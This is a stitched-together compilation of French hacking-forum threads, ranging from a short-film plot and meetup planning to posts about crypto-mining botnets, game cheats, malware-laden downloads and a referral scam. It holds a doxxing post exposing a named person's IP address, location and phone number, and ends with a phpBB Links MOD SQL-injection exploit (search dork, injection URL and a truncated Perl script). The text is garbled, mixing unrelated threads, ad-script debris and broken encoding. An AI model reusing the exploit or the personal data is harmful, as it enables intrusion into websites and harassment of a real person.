salut la compagnie   donc voila je fais un cours mÃ©trage danimation sur le hacking et je voudrait savoir si mon histoire paraissait vraisemblable ou en dehors de la rÃ©alitÃ©? donc voila...    TRHACK cest le titre :   les services secrets dÃ©cident de mettre un terme aux agissements dun pirate informatique rÃ©pondant au pseudo de m3lt melt qui est le verbe fondre en anglais  . Ils dÃ©cident alors de lui tendre un piÃ¨ge informatique en utilisant une partition du serveur dune grande banque et en y insÃ©rant de fausses donnÃ©es fiscales en guise dappÃ¢t. AprÃ¨s avoir pris contacte avec ce dernier ils se font passer pour des commanditaires qui voudraient rÃ©cupÃ©rer toutes les donnÃ©es concernant le compte dun certain Mr. Wrong et quen contre partit il pourrais garder tout largent de la banque pour lui en plus de son salaire de 176.000 . Ils lui fournissent aussi le numÃ©ro du compte en question et lip du serveur de la banque. m3lt accepte le contrat et se met en Åuvre. Mais en se connectant au serveur il perÃ§oit quelques anomalies et en cherchant un peu il saperÃ§oit quon est en train de le tracer. Mais il lui en faut plus pour perdre la face et procÃ¨de Ã  une manipulation de son proxy qui va lui gÃ©nÃ©rer plus de 200 ips en moins de 30 secondes a moins quil utilise une connexion par un relais dordinateurs. les services secrets ne savent plus ou donner de la tÃªte et saperÃ§oivent bientÃ´t quil a dÃ©couvert lexistence de la deuxiÃ¨me partition du serveur et que celleci est bien rÃ©elle. les services secrets dÃ©cident donc de couper la connexion entre le pirate et le serveur mais ne peuvent pas simplement dÃ©brancher le serveur et oui cest une banque on ne peut pas faire nimporte quoi. donc aprÃ¨s leurs moultes essais ils voient disparaitre informatiquement plus de 40.000.000 de  et le hacker disparait dans la nature juste aprÃ¨s ses faits en aillant laisser un petit message de remerciement a la banque du genre Hacked by m3lt Thank you Lords. on le revoit aprÃ¨s sirotant un cocktail sur une Ã®le des caraÃ¯bes. FIN   je sais que Ã§a mÃ©rite dÃªtre un peu plus dÃ©veloppÃ© mais cest dÃ©jÃ  une idÃ©e de base et jaimerais savoir vos diffÃ©rents avis sur le sujet afin de ne pas faire nimporte quoi... voili voilou   bonne soirÃ©e a tous
Pourquoi ne pas faire paraitre pour un fois le hacker comme une personne gentille?  Yen a marre des mÃ©chants hackers au cinÃ©ma et puis sa rendrait le script plus original  Sinon pour la faisabilitÃ© des actes faut attendre lavis des pros   Bonne chance pour ton court mÃ©trage 
Jen pense que cest un bon dÃ©but pour un cours metrage     MÃªme si cest un peu technique pour un public normal cest Ã  dire mÃªme si cest dommage un public qui ny connaÃ®t rien :/ .   Maintenant cela dÃ©pend du public que tu vises bien sÃ»r.   Ce que je note de nÃ©gatif un GROS nÃ©gatif si tu veux mon avis cest que m3lt se voit proposer de largent pour un travail de rÃ©cupÃ©ration de donnÃ©es personnelles  en faisant cela tu vas entachÃ© le mot H@ck    mÃªme si je sais que ce nest pas fait exprÃ¨s neib quand tu crÃ©e quelque chose pense et pÃ¨se la chose mÃ»rement.    Mais cest pas pour autant quil faut tarrÃªter la     Bonne chance et si tu as besoin de critique ont est la  
Citation:    Pourquoi ne pas faire paraitre pour un fois le hacker comme une personne gentille?  Yen a marre des mÃ©chants hackers au cinÃ©ma et puis sa rendrait le script plus original     cest vrai tu as raison mais bon... je nai pas encore dhistoire avec le gentil  non en vrai jai un theme qui est le fond et cest pourquoi jai pensÃ© a dÃ©tournement de fonds voila.      Citation:    m3lt se voit proposer de largent pour un travail de rÃ©cupÃ©ration de donnÃ©es personnelles  en faisant cela tu vas entachÃ© le mot H@ck      oui je ne veux pas faire nimporte quoi non plus mais personne a dit que hacker=gentil mais je ferrais attention a lavenir quand mÃªme et utiliserais le terme de pirates informatique.      Citation:    Bonne chance et si tu as besoin de critique ont est la     pour ce qui est des critiques je suis preneur dÃ©ja juste pour parler de quelle direction prendre ce qui est faisable ce qui lest pas ainsi que toutes les bonnes idÃ©es que tout le monde peut avoir... je ferrais de mon mieux pour que ce projet voit le jour correctement et qui sait je le mettrais surement en ligne    mais je vous remercie quand mÃªme pour ces deux remarques.
Hola on se calme tout le monde moi persos je suis dÃ©solÃ© mais ton script cest du vu vu et rerevu   Le hacker qui se connecte a un serveur en 2min3sec detourne des millions et a ce mÃªme moment il y a tout le FBI qui est sur son pc une sorte de combat informatique lapocalypse il y a eu des nuages de grenouilles la terre a trembler 5 fois les nouveau nÃ©es sont morts enfin merde kwa    La je suis fachÃ©  car neib jai deja eu loccasion de te lire un peux sur le fofo et franchement dis moi tu y crois ????  Jai limpression de lire le script dune mauvaise suite de Traon ou une serie B des annÃ©es 80 Ou encore un remake de Mission Impossible 1.  DÃ©solÃ© je vais te rerÃ©pondre une fois calmÃ© mais lke plsu clair est la :  Cest bidon prÃ©visible et bancale comme scÃ©nar    
Salut cest vrais que ton scÃ©nario est commun il faut que tu lui donne un peut doriginalitÃ© mais tu as eu mon point de vue sur le Tchat maintenant je te soutient dans ton projet.   Bonne journÃ©e.
No souci pour devenir un noeud du maillage.
salut tout le monde hier jai vu que le dediÃ© fonctionnait jai donc codÃ© un truc pour additionner les nombre mon script marche pourtant bien mais jai la reponse  apprends a compter     Jai ratÃ© quelquechose  ?   si quelquun pouvait testÃ© pour me dire si je me trompe ou non ...    merci    Edit:  En fait jai finalement trouvÃ© cest mon script jenvoyais une string mal formÃ©e ... lol   Ah ces strings ...   Ã§a doit etre une vm americaine ... ya 6h de decalage horaire pour lhistorique des connexions .. lol   apres ya plus qu1 heure de decalage dans le systeme en UTC donc. 
Entendu topic clos.   Cest lÃ  que le challenge commence kev1 
Salut a tous Ã§a fait quelques temps que jy pense et au final je me lance. Jai pour idÃ©e de faire durant le mois daout des webinars quanimeront les membres de la commu a raison de un par semaine le samedi ou vendredi soir. Entre 30min et 1H je plus intÃ©ressant a mon avis serait davoir un vrai dÃ©bat dÃ©bat pas foire dempoigne XD autours que quelques sujet qui auront Ã©tÃ© soumis aux membres et choisis avec un sondage dans le topic. Pour ma part je ne compte pas faire de prÃ©sentation je pense que jai dÃ©ja assez despace de avec mes webcasts articles mon blog etc... Par contre je serais ravi de participer aux diffÃ©rente webcasts. Jai trouvÃ© quelques idÃ©es pour le premier si Ã§a en intÃ©resse certains faite vous connaitre     Cloud Computing et libertÃ©  Tout le monde connait lavis de Stallman sur la questionje pense que ce sujet ferait un bon dÃ©bat.   Dark side of the Mug  Cest un sujet qui me tient un peu a coeur parce que non pas trop orientÃ© dÃ©bat amis plutÃ´t un Ã©change de bonne pratique. Jimaginais que chacun pourrais apporter des retour dexpÃ©rience sur des projets de dÃ©veloppement en Ã©quipe. Ãchanger les bonne pratique conseil comment chacun pensetil quun projet peut Ãªtre menÃ© a terme que faut il pour ? Dou le titre Dark Side of the Mug vu que tout bon dÃ©veloppeur ingurgite quotidiennement 524L de cafÃ©ine.   Conviction ou pragmatisme ?  Alors la cest... Le sujet qui si il est traitÃ© risque de chauffer le plus desprit et de plaire le plus aux auditeurs. Pas besoin dexplication que pour savoir que le dÃ©bat sera tendu amis amicale. En rÃ©sumÃ© quand privilÃ©giÃ© ses convictions au pragmatisme et linverse. dans linformatique   A nos dÃ©but...  Oauis bon ok la plupart dentre nous nont pas plus de 30ans... Mais on a  tous commencÃ© et Ã§a pourrait Ãªtre sympa de partager nos expÃ©riences avec les autres de maniÃ¨re un peux plus chaleureuse que le classique article de ESR ^^   Vers ou allons nous ?  AprÃ¨s le dÃ©but la fin comment voyons nous lavenir ? dans linformatique dans le hacking dans la sociÃ©tÃ© en gÃ©nÃ©rale au niveaux des libertÃ©s individuelles et collectives... Orwell avaitil raison ?   Lopen source aujourdhui  On pourrait chacun prÃ©senter briÃ¨vement un projet open source rÃ©cent ou qui a beaucoup fait parlÃ© de lui ces derniers temps chaque fois suivi dun petit debat/questions.   La plateforme de communication sera simple soit DimDim qui permet de faire des webinar avec partage decran prÃ©sentation whiteboard et confÃ©rence audio biensure ou simplement via skype.   Si Ã§a en intÃ©resse rÃ©pondez ici. Le sondage est lancÃ© pour le premier proposez dÃ©jÃ  des sujets pour le second. Pour info le premier se dÃ©roulera le 31 aout. Ensuite le 6/7 13/14 20/21 27/28. Selon les dispos de chacun le vendredi ou le samedi   Il fraudais au minimum 5 participants pour que Ã§a soit sympa   Inform@tiquement  Manu404
Jai beaucoup hÃ©sitÃ© entre Dark side of the mug qui me tentait le plus et pragmatisme.   Je pense que pour une premiÃ¨re Ã©dition pragmatisme attirera plus de monde.   La tortue.
Cest une trÃ¨s bonne idÃ©e Manu   Pour ma part je suis partant pour essayer Ã©galement et men vais installer dimdim et prÃ©parer 2/3 arguments    Edit: Pas besoin dinstaller quoique ce soit il suffis de sidentifier ici: http://www.dimdim.com/website/signup  Puis de rejoindre un salon: https://my.dimdim.com/hackbbs/
Pour le moment pour le webcast de demain on est :    Korigan  Dereckson et/ou Sinuso ? Hackerspace Charleroi  Tortukitu ?  Skorm ?  RootBSD ?  Moi   Dautres sont intÃ©ressÃ© ?  Si jamais cest a 20H sur DimDim.  Je mettrai demain en ligne lurl du salon.     EDIT  Changement de programme pas de vocal meeting sur DimDim donc tous sur skype. Rajoutez moi : Istace Emmanuel ainsi jinviterai tout le monde pour le debat.  Aussi Ã§a se fera peut Ãªtre ce soir stay tuned
Voila une tres bonne idÃ©e a laquelle je serais ravis de participer je serais entierement dispo ce soir ou dans la semaine 
Hello   Seraitil possible dutiliser une solution libre comme empathypar exemple plutot que Skype?   Il suffirait alors dinstaller un plugin libre comme Muji pour faire des visio Ã  plusieurs et dutiliser un compte gtalk ou mieux jabber    Cordialement   Korigan    Lien des testeurs fr jabber: http://forum.ubuntufr.org/viewtopic.php?pid=3489264  Site officiel: http://telepathy.freedesktop.org/wiki/Muji  Ou encore un petit guide dinstallation: http://doc.ubuntufr.org/muji
Tien jy avais pas penser ^^ Mais cest toujours mieu  100 daccord    PS: Quelquun a deja pu tester la qualitÃ©e des services dempathy?
Debat ce soir annulÃ© reportÃ© a la semaine prochaine
lu  dsl je ne pourais pas venir memes si jaurais voullu participer a cette aventure  la raison est que jhabite dans le loiret    a la limite si vous avez un groupe Ã©lectrogene ou plusieur multiprise et une petite participations pour les frais electriciter cela peut peut etres ce dÃ©rouler chez moi     si vous passer faite moi signe     
Yopyop   Les choses se prÃ©cisent.   Deux lieu sont proposÃ©:   Donneville dans le 31 Ã  20Km de toulouse. PossibilitÃ© de venir en train. Location: 200euro.  Il faut se fixer rapidement pour rÃ©server la salle.   Trainou dans le 45 le loiret. Petite salle avec jardin et tout pas de location cest chez un ami. Mais ce serait bien de donner une petite participation pour les frais et tout.   Je rajoute un sondage Ã  ce topic. Toute rÃ©action sera la bienvenue. ^^   Korigan
MWa jai votÃ© Donneville.   Pourquoi ?    Bah cest moi qui propose la salle    Pke dans le Sud il fait beau   ProximitÃ© de landorre pour aller chercher le liquide pour le BBQ   Salle isolÃ© et donc trankil sans gener les voisins   Je pense que pour la plupart des gens inscrits sont dans le sud me trompes pe   Espace exterieur ET interieur en cas de mauvais temps ou de grosse chaleure    Pas de connection Net en meme temps une irl c pas pour rester scotcher devant son pc sinon autant rester chez soi   Prix pour la location mais possibilitÃ©s de nÃ©gocier et puis 200 / 10 ca fait 20e par tete .. c pas la mort.   Pas de retroprojecteur mais pi etre ke kkun pourrais sen procurer un pour faire des ptites demos pour les djeunz ou bien faire un concours de wii   Pas de groupe electrogene mais bon avec les prises toussa toussa ca devrais le faire   Il sagit de la salle des fetes de la mairie donc habituÃ©e a recevoir pas mal de matos eclairage sono etc .. donc je pense pas que le grp electrogene soir indispensable.   Voila a vous de votÃ©  Bonne soirÃ©e.   [Edit : evite les double post Ness ]  Petite prÃ©cision:   je naccepterai aucune personnes mineures ... pour des raisons qui sont bien Ã©videmment .. de responsabilitÃ©s.
Virus miner<sep>  Seo wrote:  http://bescherelle.com/Merci aussi pour lidée    dsl je ne suis pas a lécole Français je suis dent une école néerlandais et tu peux pas maider pour le mineur? show_eval16941NoteEvaluateLessMore; 
Virus miner<sep>Jai lastuce mais sa fait 5 tu me règle comment ? après si tu veux vraiment que je te donne directement le logiciel que tu modifiras par la suite demande à seo quil munban du discord et la je serais clément envers toi  show_eval16944NoteEvaluateLessMore; 
Virus miner<sep>si tu étais moins con tu aurais vu que tu nes plus ban XD show_eval16945NoteEvaluateLessMore; 
Virus miner<sep>absolument inutile même avec 500 bots tu peux faire 5 euro de crypto par jour maxi  show_eval16961NoteEvaluateLessMore; 
Virus miner<sep>bah pas forcement ca dépends de plus de facteur :  le nombre de bot la en loccurrence 500                                               La puissance total                                               La monnaies et lalgorithme                                                La puissance que tu consacre au mining sur les pc infecté genre 2                                                  threads sur 4 pour un CPU show_eval16965NoteEvaluateLessMore; 
Virus miner<sep>Tu viens de le perdre en disant des mots aussi techniques  show_eval16969NoteEvaluateLessMore; 
Virus miner<sep>jespere pas quand meme XD show_eval16972NoteEvaluateLessMore; 
[TUTO] Free Gifts !<sep>Yo les petits Hackers     Aujourdhui je vais vous montrez comment obtenir plus de 15 types de cartecadeaux simplement  Tout ça est bien sûr légal     Ouvrez votre navigateur Internet sur votre appareil iOS ou Android.  Tapez ce lien manuellement sur la barre dadresse: featu.re/Q79AD4 Inscrivezvous avec ce lien. Vous pourriez être invité à entrer un code le code est Q79AD4 Ce code vous donnera 50 points  télécharger des applications pour gagner des points pour obtenir des récompenses    Voilà cest fini cétait vraiment facile   Un grand merci davoir pris le temps de lire mon petit tuto est on se dit a bientôt tchao     ______________________________  Une vie ne vaut rien mais rien ne vaut une vie. show_eval1629NoteEvaluateLessMore; 
[TUTO] Free Gifts !<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
[TUTO] Free Gifts !<sep>écriver sa ses le vrai lien : featu.re/Ta lsum ? x ta pas tes crédits car les autres ne sinscrive pas avec ton code ______________________________  Nous avons lage de lunivers : rien ne se perd  rien ne se crée  tout ce transforme  show_eval1655NoteEvaluateLessMore; 
[TUTO] Free Gifts !<sep>Tu cest sa sappelle de la gaminerie tu as 9 ans ?  ______________________________  Une vie ne vaut rien mais rien ne vaut une vie. show_eval1680NoteEvaluateLessMore; 
[TUTO] Free Gifts !<sep>  SkyUnIIk wrote:  Tu cest sa sappelle de la gaminerie tu as 9 ans ?    Non ceci :   ArdsGames wrote:  écriver sa ses le vrai lien : featu.re/Ta lsum ? x ta pas tes crédits car les autres ne sinscrive pas avec ton code    Est du troll______________________________  MisterMattt77 CSGO Player and virus fan.Booter utilisé : http://StresserIP.esy.es/ show_eval1682NoteEvaluateLessMore; 
SITE DE CRACKS IGG GAMES<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
comment hacker un comte youtube<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
comment hacker un comte youtube<sep>xDDDDD    les feministes xDDDDil te faut bruteforce sont compte gmail :3 ou hack sont compte gmail tout simplementxDDD______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval14033NoteEvaluateLessMore; 
EBOOK PYTHON 2x et 3.x<sep>Bonjour aujourdhui je vous propose 2 ebook pour apprendre le langage PythonPython 2.x :  https://mega.nz/fg4XWRwDS7WubkS7xV8SqREKiBX5jOdMTI7Qq4dFDG66gFxu8 Python 3.x :  https://mega.nz/GtBR3IbL_prJgB5swQQfeUqLuTp2kK3MSePm54XIFEAm70Fc Python 3.x est la versions de python que je vous conseille dapprendre ______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval11258NoteEvaluateLessMore; 
EBOOK PYTHON 2x et 3.x<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
EBOOK PYTHON 2x et 3.x<sep>Merci BackTrack ______________________________  We are Legion. We do not Forgive. We do not Forget.We are Anonymous show_eval11261NoteEvaluateLessMore; 
EBOOK PYTHON 2x et 3.x<sep>  MadzBlind wrote:  Merci BackTrack    Derien X______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval11262NoteEvaluateLessMore; 
Presentation DarkZone<sep>Pas tres complet mais bienvenue parmi nous show_eval11953NoteEvaluateLessMore; 
[TUTO]Le texto qui fait planter l’iPhone (iOS 8).<sep> show_eval12983NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>bonjour tous le monde j ai trouve un hack CS:GO qui marche et je voulais le partager on peus se fair BAN VAC  show_eval12359NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
hack menu sur CS:GO<sep>bah mets le lien______________________________  oui show_eval12360NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>Autant use un poly hack show_eval12364NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>Qui est chaud pour faire du HackVsHack ? ______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval12365NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>desoler coupure de wifi voila le lin http://www.mediafire.com/download/zjj6cdo47j1lwhx/A Bit Smarter2.exe show_eval12380NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>A bit Smarter = A EVITER show_eval12410NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>Lien censuré______________________________  Nous sommes Anonymous. Nous sommes Légion. Nous ne pardonnons pas. Nous noublions pas. RedouteznousSachez que ce qui est sécurisé à 99 nest pas sécuriséLife is a hackPrice show_eval12425NoteEvaluateLessMore; 
hack menu sur CS:GO<sep> show_eval12889NoteEvaluateLessMore; 
hack menu sur CS:GO<sep>______________________________   Le Hacke cest la vie  si ta un soucis mon amie   une       mauvaise note ou un site qui te plait pas appelle moi                                               Bitches DAB show_eval13576NoteEvaluateLessMore; 
MasterTools V.1.5<sep>LA MAJ DE MON LOGICIEL EST SORTI : https://dl.dropboxusercontent.com/s/8z5nxb3a67ejw4r/MasterTools20Setup20v1.5.exe?dl=0Si vous avez déjà le logiciel lancez le et vous pourez directement dl la MAJ show_eval13726NoteEvaluateLessMore; 
MasterTools V.1.5<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
MasterTools V.1.5<sep>Za Sairt ha kwa ?______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval13734NoteEvaluateLessMore; 
MasterTools V.1.5<sep>lien du fichier invalide  show_eval13845NoteEvaluateLessMore; 
MasterTools V.1.5<sep>Ce Logiciel sert a quoi ? ______________________________  Ma spécialité et de voler des CB grace au malware Zeus mais chuuuut il faut le dire a personne  show_eval14082NoteEvaluateLessMore; 
BotNet<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
BotNet<sep>MHHHHHHHHHHHH MHHHHHHHHHHHHHHHHHHHHHHH How to say......CYKA BLYAT show_eval16367NoteEvaluateLessMore; 
BotNet<sep>MdrrrrrrrrrrrBut its realy interesting  ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16368NoteEvaluateLessMore; 
BotNet<sep>Franchement Jadore Ton Russe Seo ______________________________  Copyright c dontssmeEZ La S3CURIT3R Mon site de générateur de compte:http://lickandleak.alwaysdata.net/ show_eval16370NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>Salut les leechers aujourdhui je vais vous présenter un checker de comptes fortnite    /\ LIEN DELETE /\Bon check      Et toi bon           Traja06 show_eval17725NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
FortniteReaper -- {VIRUS - Sujet Clos}<sep>ddb______________________________  you knowed since the start b u t y o u w a n t e d t o f o r g e t. show_eval17740NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>ddb admin cest un rat______________________________  you knowed since the start b u t y o u w a n t e d t o f o r g e t. show_eval17804NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>en plus mal crypter x______________________________  you knowed since the start b u t y o u w a n t e d t o f o r g e t. show_eval17805NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>Il est pas crypter xdd te prends pas pour n hacker xdddddd show_eval17806NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>donc cest un rat voila______________________________  you knowed since the start b u t y o u w a n t e d t o f o r g e t. show_eval17822NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>ok je vais supprimer le lien faites attention a vous______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval17827NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>thanks traja on sait jamais pour les lamerz qui pourrait se faire avoir... je comprends pas pourquoi les gens mettent des rats sur des forums de hacking la logique est un peut partie la :hap:   Traja06 wrote:  ok je vais supprimer le lien faites attention a vous ______________________________  you knowed since the start b u t y o u w a n t e d t o f o r g e t. show_eval17912NoteEvaluateLessMore; 
FortniteReaper -- {VIRUS - Sujet Clos}<sep>  Random666 wrote:  thanks traja on sait jamais pour les lamerz qui pourrait se faire avoir... je comprends pas pourquoi les gens mettent des rats sur des forums de hacking la logique est un peut partie la :hap:   Traja06 wrote:  ok je vais supprimer le lien faites attention a vous  Tqt  Et malheureusement ils sont cons mais en même temps pas tant que ça  Car ils profitent de la naïveté des gens en leurs proposant des crack ou autres et généralement cest pas très légit pour les AntiVirus etc.. du coup cest assez facile de glisser un petit virus etc.. ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval17943NoteEvaluateLessMore; 
Besoin d'un crack (VoiceAttack)<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Besoin d'un crack (VoiceAttack)<sep>sinon tu fais ton JeanProgrammeur et tu le fais toi meme show_eval16163NoteEvaluateLessMore; 
help Armitage , Kali !<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
MOVIE DOWNLOADER<sep>BonjourINFORMATIONS  Ce logiciel a été créer par Shakatar.   Il est actuellement en version 1.0 et il est mis constamment à jour vous pouvez suivre son évolution grâce à la chaine du créateur.  INFORMATIONS   À PROPOS DU LOGICIEL  Ce logiciel sert à trouver des films téléchargement direct et torrent pour les télécharger.  Pour linstant le logiciel ne prend en charge que 4 plateformes de téléchargement :   http://www.hdpopcorns.in   http://www.foumovies.com  http://torrentmovies.co  https://thepiratebay.org  À PROPOS DU LOGICIEL  BESOIN DAIDE  Si vous rencontrez des problèmes veuillez me contacter par MP Youtube.  Ou par mail : ShakatarYT@gmail.com.  BESOIN DAIDE   PREVIEW   PREVIEW            Last edited by Shakatar on Sun 28 Jan  13:14 2018; edited 3 times in total show_eval16643NoteEvaluateLessMore; 
MOVIE DOWNLOADER<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
MOVIE DOWNLOADER<sep>GG à toi show_eval16647NoteEvaluateLessMore; 
[Logiciel] CommView 6 (Scanner De Réseau)<sep>merci show_eval16428NoteEvaluateLessMore; 
[Logiciel] CommView 6 (Scanner De Réseau)<sep>De rien ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval16432NoteEvaluateLessMore; 
[Logiciel] CommView 6 (Scanner De Réseau)<sep>  Random666 wrote:  cool merci traja     ducoup les 3 dll doivent etre dans la racine de comm ?  De rien  et oui il me semble jai un peu oublié mais logiquement oui ______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval17584NoteEvaluateLessMore; 
Mettre un vpn facilement ,gratuitement et fonctionnelle<sep>Bonjour jaimerais savoir comment mettre un vpn gratuitement et facilement.Jen cherches un qui est facile a désactiver et à activer .Mais le problème cest que ma co fais 300 kbs sec sa serais un inconvénient. Eceque je risque de rendre ma connexion encore plus nul ?______________________________  Simple mais très utile :p show_eval11446NoteEvaluateLessMore; 
Mettre un vpn facilement ,gratuitement et fonctionnelle<sep>il y a deja un tuto  je ferme la discution show_eval11448NoteEvaluateLessMore; 
Hello World<sep>Coucou a toute et tous je mappelle Alice Juan K jai 24 ans et jhabitude en AuvergneRhoneAlpes et ou je travaille pour une PME dans lelectronique.Je programme en C et script en Bash et Python.Jutilise des systemes peu connu    En esperant en apprendre plus parmis vous a vos claviers. show_eval18208NoteEvaluateLessMore; 
Comment Spoof un E-mail sur Kali<sep>Bon bas pas de soucis alors show_eval16360NoteEvaluateLessMore; 
Hack Youtube<sep>Salut je voudrais savoir si vous savez hacker des chaines youtube ou des vidéos Ps : Je ne connais rien en hack si quelquun veut bien mapprendre à hack ______________________________  Qui veut mapprendre à hacker? show_eval1676NoteEvaluateLessMore; 
[DOX] Kikoo Du 18-25 qui m'a menacé sur skype<sep>Slt a tous Je vais juste poster un DOX sur un pige qui ma menacé sur Skype il vient du 1825 HO LE THUG  xD.Il ma menacé de DÉFONCER Mon PC mais il ma rien fait et en plus il ma dit quil allait me faire de la pub sur son twitch avec ses 2 viewers il ne va pas faire grand chose mdr Il mavait dit Tu nauras plus de PC dans moins dune heure mais jai attendu plus de 6h pour quil me face un truc mais il ma jamais rien fait sa fait 1 semaine je crois xD.                      DOX IP            Son Skype: whiteweedow                              DOXED ice_tea_troopicaal Amis Skype BY ANORHACK IP Address:176.137.91.35Reverse DNS:35.91.137.176.inaddr.arpaHostname:put92h031761379135.dsl.sta.abo.bbox.frNameservers:ns2.perf1.fr >> 81.92.87.76                        ns2.bouyguesbox.fr >> 194.158.123.53                        ns1.bouyguesbox.fr >> 194.158.122.53Continent:Europe EUCountry:France   IP Location Find In France FRCapital:ParisState:IledeFranceCity Location:PuteauxPostal:92800ISP:Bouygues TelecomOrganization:Bouygues TelecomAS Number:AS12844 Bouygues Telecom SATime Zone:Europe/ParisLocal Time:20:31:02Timezone GMT offset:7200Sunrise / Sunset:06:19 / 21:16Continent Lat/Lon:48.69083 / 9.1405Country Lat/Lon:46 / 2City Lat/Lon:48.8789 / 2.2393IP Language:FrenchIP Address Speed:Broadband Cable/DSL Internet Speed[ Check Internet Speed]IP Currency:Euro CFP FrancIDD Code:33Num tél : 330762041430              FINISH DOXED BY ANORHACK        ______________________________  An bèz dé groce mer  show_eval15167NoteEvaluateLessMore; 
[DOX] Kikoo Du 18-25 qui m'a menacé sur skype<sep>Site : http://www.iptracker.org/Ce site est hallucinant sur sa précision.______________________________  Bye show_eval15170NoteEvaluateLessMore; 
Comment géolocaliser une personne avec une ip ?<sep>Bonjour jaimerais savoir comment géolocaliser une personne avec son ip jai déjà chercher sur Google mais sa marche jai testé avec mon ip ______________________________  Simple mais très utile :p show_eval11599NoteEvaluateLessMore; 
pour trouver les sites faillibles :  allinurl:links.php?t=search  ou: Links MOD v1.2.2 by phpBB2.de    Lexploit en lui mÃªme :   SQL INJECTION: Exploit: links.php?t=searchsearch_keywords=asdstart=1120UNION20SELECT201usernameuser_password45678910111220FROM20phpbb_users20WHERE20user_id=2/     le code en perl :     Code:      /usr/bin/perl   print q{   phpBB <= 2.0.22  Links MOD <= v1.2.2 Remote SQL Injection Exploit   Bug discovered by Don  Dork: allinurl:links.php?t=search    or: Links MOD v1.2.2 by phpBB2.de  SQL INJECTION: Exploit: links.php?t=searchsearch_keywords=asdstart=1120UNION20SELECT201usernameuser_password45678910111220FROM20phpbb_users20WHERE20user_id=2/   };   use IO::Socket;   print q{  => Insert URL  => without  http   => };  server = <STDIN>;  chop server;  print q{  => Insert directory  => es: /forum/  /phpBB2/  => };  dir = <STDIN>;  chop dir;  print q{  => User ID  => Number:  => };  user = <STDIN>;  chop user;  if ARGV[2] {  }  myuser = ARGV[3];  mypass = ARGV[4];  myid = ARGV[5];  server =~ s/http:\/\///eg;  path = dir;  path .= 